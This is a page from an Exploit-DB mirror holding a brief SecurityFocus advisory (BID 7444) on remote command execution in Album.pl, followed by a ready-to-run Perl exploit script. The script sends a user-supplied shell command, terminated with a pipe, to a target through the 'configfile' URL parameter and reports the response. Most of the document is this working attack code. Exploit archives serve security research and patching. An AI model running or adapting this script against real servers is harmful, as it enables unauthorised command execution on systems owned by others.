exploit-db-mirror/exploits/cgi/webapps/22545.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
793 B
Perl
Executable file

source: https://www.securityfocus.com/bid/7444/info
A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.
The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.
#!/usr/bin/perl -w
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;
if (!$ARGV[0] && !$ARGV[1])
{
print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
exit;
}
$command="$ARGV[0]?configfile=$ARGV[1]|";
my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
printf " %s\n", $result->status_line;
}
else
{
print "Success: $result\n";
}